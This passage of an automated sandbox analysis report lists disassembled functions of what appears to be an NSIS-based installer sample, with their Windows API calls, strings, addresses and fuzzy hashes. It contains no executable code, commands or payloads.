                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: 8WB
                                                          • API String ID: 2295610775-3088156181
                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                          Function 00405331 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282windowclipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                          • GetClientRect.USER32(?,?), ref: 004053DC
                                                          • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405480
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                            • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405508
                                                          • ShowWindow.USER32(00000000), ref: 0040552C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405531
                                                          • ShowWindow.USER32(00000008), ref: 0040557B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                          • CreatePopupMenu.USER32 ref: 004055C0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                          • GetWindowRect.USER32(?,?), ref: 004055F4
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                          • OpenClipboard.USER32(00000000), ref: 00405655
                                                          • EmptyClipboard.USER32 ref: 0040565B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                          • CloseClipboard.USER32 ref: 004056B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {$&B
                                                          • API String ID: 590372296-2518801558
                                                          • Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                          • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                          • Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                          • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                          Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID: &B
                                                          • API String ID: 184305955-3208460036
                                                          • Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                          • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                          • Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                          • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                          Function 0040391F Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 216stringregistrylibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,76233420,00000000,00434000), ref: 004039A0
                                                          • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                          • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                          • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                          • API String ID: 914957316-1918744475
                                                          • Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                          • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                          • Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                          • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                          Function 00404337 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 207windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                          • GetSysColor.USER32(?), ref: 00404417
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: N$open
                                                          • API String ID: 3615053054-904208323
                                                          • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                          • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                          Function 00405C66 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                          • wsprintfA.USER32 ref: 00405CDE
                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                          • API String ID: 1265525490-899692902
                                                          • Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                          • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                          • Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                          • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                          • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                          Function 00404635 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 265stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                          • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                          • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                            • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266
                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                          • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$&B
                                                          • API String ID: 2246997448-2586977930
                                                          • Opcode ID: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                          • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                          • Opcode Fuzzy Hash: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                          • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                          Function 00402DBC Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                          • GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
                                                          Strings
                                                          • Error launching installer, xrefs: 00402E0C
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                          • Null, xrefs: 00402EB5
                                                          • Inst, xrefs: 00402EA3
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                          • soft, xrefs: 00402EAC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-787788815
                                                          • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                          • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                          Function 00405F6A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                          • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060AB
                                                          • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 004060BE
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                          • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                          • CoTaskMemFree.OLE32(?), ref: 00406113
                                                          • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                          • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                          Strings
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-730719616
                                                          • Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                          • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                          • Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                          • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                          Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                          • GetSysColor.USER32(?), ref: 00404265
                                                          • SetBkColor.GDI32(?,?), ref: 00404275
